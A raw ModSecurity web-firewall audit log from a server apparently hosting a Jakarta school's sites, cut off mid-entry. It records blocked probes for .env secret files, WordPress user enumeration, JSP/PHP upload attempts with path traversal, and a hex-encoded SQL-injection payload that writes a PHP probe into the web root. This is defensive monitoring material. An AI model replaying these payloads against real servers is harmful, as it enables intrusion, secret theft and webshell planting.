--e4bb0552-Z-- --c2303550-A-- [22/May/2025:14:41:02 +0700] aC7VDuThJmFSRJ5-OZfB0QAAAEs 103.236.140.4 34554 103.236.140.4 8181 --c2303550-B-- GET /.env.staging.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --c2303550-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2303550-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899662260189 832 (- - -) Stopwatch2: 1747899662260189 832; combined=381, p1=341, p2=0, p3=0, p4=0, p5=40, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2303550-Z-- --f16da31f-A-- [22/May/2025:14:41:04 +0700] aC7VEGfriXjg62qQwE9RHgAAAIs 103.236.140.4 34566 103.236.140.4 8181 --f16da31f-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --f16da31f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f16da31f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899664312234 766 (- - -) Stopwatch2: 1747899664312234 766; combined=293, p1=257, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f16da31f-Z-- --a26b5f5a-A-- [22/May/2025:14:41:06 +0700] aC7VEmfriXjg62qQwE9RJAAAAJQ 103.236.140.4 34580 103.236.140.4 8181 --a26b5f5a-B-- GET /.env.sandbox HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --a26b5f5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a26b5f5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899666356018 774 (- - -) Stopwatch2: 1747899666356018 774; combined=323, p1=289, p2=0, p3=0, p4=0, p5=34, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a26b5f5a-Z-- --7c77eb12-A-- [22/May/2025:14:41:08 +0700] aC7VFGfriXjg62qQwE9RKgAAAJA 103.236.140.4 34592 103.236.140.4 8181 --7c77eb12-B-- GET /.env.default HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --7c77eb12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c77eb12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899668412882 780 (- - -) Stopwatch2: 1747899668412882 780; combined=306, p1=266, p2=0, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c77eb12-Z-- --7ee1044c-A-- [22/May/2025:14:41:09 +0700] aC7VFWfriXjg62qQwE9RLQAAAIA 103.236.140.4 34598 103.236.140.4 8181 --7ee1044c-B-- GET /prod/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --7ee1044c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ee1044c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899669101550 763 (- - -) Stopwatch2: 1747899669101550 763; combined=321, p1=266, p2=0, p3=0, p4=0, p5=55, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ee1044c-Z-- --90667529-A-- [22/May/2025:14:41:10 +0700] aC7VFmfriXjg62qQwE9RMQAAAIc 103.236.140.4 34606 103.236.140.4 8181 --90667529-B-- GET /.env.preprod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --90667529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90667529-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899670471511 726 (- - -) Stopwatch2: 1747899670471511 726; combined=307, p1=267, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90667529-Z-- --b5623312-A-- [22/May/2025:14:41:11 +0700] aC7VF-ThJmFSRJ5-OZfB1QAAAFc 103.236.140.4 34612 103.236.140.4 8181 --b5623312-B-- GET /build/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.68.113.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.68.113.50 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --b5623312-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5623312-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747899671152473 537 (- - -) Stopwatch2: 1747899671152473 537; combined=211, p1=184, p2=0, p3=0, p4=0, p5=27, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5623312-Z-- --2a769e54-A-- [22/May/2025:14:47:04 +0700] aC7WeGfriXjg62qQwE9SqwAAAI8 103.236.140.4 35612 103.236.140.4 8181 --2a769e54-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.161.49.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.161.49.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2a769e54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a769e54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747900024019773 1998 (- - -) Stopwatch2: 1747900024019773 1998; combined=1005, p1=321, p2=657, p3=0, p4=0, p5=26, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a769e54-Z-- --921e9006-A-- [22/May/2025:14:56:10 +0700] aC7YmmfriXjg62qQwE9TIQAAAIs 103.236.140.4 35996 103.236.140.4 8181 --921e9006-B-- POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=mluhmcfe.jsp&filename=1.jpg HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 250 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Content-Type: multipart/form-data Upgrade-Insecure-Requests: 1 X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 159421967 --921e9006-C-- ------WebKitFormBoundary92pUawKc Content-Disposition: form-data; name="myFile";filename="test.jpg" <% out.println("fooiqjzoyn");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %> ------WebKitFormBoundary92pUawKc-- --921e9006-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --921e9006-H-- Message: Multipart parsing error (init): Multipart: Boundary not found in C-T. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart: Boundary not found in C-T."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Message: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "30"] [id "210240"] [rev "4"] [msg "COMODO WAF: Multipart request body failed strict validation: PE 1, BQ 0, BW 0, DB 0, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747900570557033 5621 (- - -) Stopwatch2: 1747900570557033 5621; combined=4539, p1=411, p2=4095, p3=0, p4=0, p5=32, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --921e9006-Z-- --2c59497c-A-- [22/May/2025:15:04:23 +0700] aC7ah2friXjg62qQwE9ThQAAAJY 103.236.140.4 36386 103.236.140.4 8181 --2c59497c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.235.185.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.235.185.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2c59497c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c59497c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747901063938033 2983 (- - -) Stopwatch2: 1747901063938033 2983; combined=1308, p1=444, p2=829, p3=0, p4=0, p5=35, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c59497c-Z-- --3986f541-A-- [22/May/2025:15:35:25 +0700] aC7hzSektx75wRFPQyj53wAAAMY 103.236.140.4 44698 103.236.140.4 8181 --3986f541-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 176.88.166.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.88.166.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3986f541-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3986f541-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747902925219980 2441 (- - -) Stopwatch2: 1747902925219980 2441; combined=1240, p1=414, p2=798, p3=0, p4=0, p5=28, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3986f541-Z-- --f6a1a735-A-- [22/May/2025:15:38:01 +0700] aC7iaWfriXjg62qQwE9imwAAAII 103.236.140.4 44808 103.236.140.4 8181 --f6a1a735-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0 Accept-Charset: utf-8 --f6a1a735-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6a1a735-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747903081649528 766 (- - -) Stopwatch2: 1747903081649528 766; combined=320, p1=285, p2=0, p3=0, p4=0, p5=35, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6a1a735-Z-- --d07fe209-A-- [22/May/2025:15:38:48 +0700] aC7imH0O04WKE1HJ5iRyogAAAAA 103.236.140.4 44834 103.236.140.4 8181 --d07fe209-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; VOG-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --d07fe209-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d07fe209-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747903128507774 860 (- - -) Stopwatch2: 1747903128507774 860; combined=346, p1=304, p2=0, p3=0, p4=0, p5=42, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d07fe209-Z-- --1a8ff845-A-- [22/May/2025:15:50:23 +0700] aC7lT-ThJmFSRJ5-OZfUhgAAAEs 103.236.140.4 45742 103.236.140.4 8181 --1a8ff845-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.216.50.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.216.50.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1a8ff845-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a8ff845-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747903823475800 16370 (- - -) Stopwatch2: 1747903823475800 16370; combined=28558, p1=452, p2=782, p3=0, p4=0, p5=13676, sr=83, sw=0, l=0, gc=13648 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a8ff845-Z-- --b30e181e-A-- [22/May/2025:16:41:01 +0700] aC7xLeThJmFSRJ5-OZfWfgAAAEk 103.236.140.4 47366 103.236.140.4 8181 --b30e181e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.232.112.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.232.112.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b30e181e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b30e181e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747906861387783 3157 (- - -) Stopwatch2: 1747906861387783 3157; combined=1415, p1=486, p2=897, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b30e181e-Z-- --532a7777-A-- [22/May/2025:16:48:26 +0700] aC7y6iektx75wRFPQyj7SgAAAME 103.236.140.4 49110 103.236.140.4 8181 --532a7777-B-- POST /mp/login/../uploadControl/uploadFile HTTP/1.0 Host: 218.95.66.214 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 218.95.66.214 X-Forwarded-Server: 218.95.66.214 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close Content-Length: 303 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDIsCqVMmF83ptmp --532a7777-C-- ------WebKitFormBoundaryoDIsCqVMmF83ptmp Content-Disposition: form-data; name="file"; filename="test.jsp" Content-Type: application/octet-stream clyvxpyjtc ------WebKitFormBoundaryoDIsCqVMmF83ptmp Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundaryoDIsCqVMmF83ptmp --532a7777-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --532a7777-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||218.95.66.214|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747907306936633 2925 (- - -) Stopwatch2: 1747907306936633 2925; combined=1997, p1=340, p2=1584, p3=20, p4=26, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --532a7777-Z-- --3d5e336a-A-- [22/May/2025:16:48:27 +0700] aC7y6-ThJmFSRJ5-OZfXzAAAAFE 103.236.140.4 49122 103.236.140.4 8181 --3d5e336a-B-- POST /manager/teletext/material/rewrite.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 148 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 ------WebKitFormBoundaryOKldnDPT: close Content-Disposition: form-data; name="tmp_name"; filename="test.php" Content-Type: image/png X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 165938553 --3d5e336a-C-- ------WebKitFormBoundaryOKldnDPT Content-Disposition: form-data; name="uploadtime" ------WebKitFormBoundaryOKldnDPT-- --3d5e336a-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d5e336a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=image/png"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747907307925691 3646 (- - -) Stopwatch2: 1747907307925691 3646; combined=2495, p1=431, p2=1967, p3=32, p4=35, p5=29, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d5e336a-Z-- --01a6326b-A-- [22/May/2025:16:48:30 +0700] aC7y7uThJmFSRJ5-OZfXzQAAAFU 103.236.140.4 49162 103.236.140.4 8181 --01a6326b-B-- GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.0 Host: 222.77.136.93 Cookie: CookieLanguageName=ZH-CN; CookieAuthType=0 X-Real-IP: 45.32.66.146 X-Forwarded-Host: 222.77.136.93 X-Forwarded-Server: 222.77.136.93 X-Forwarded-For: 45.32.66.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 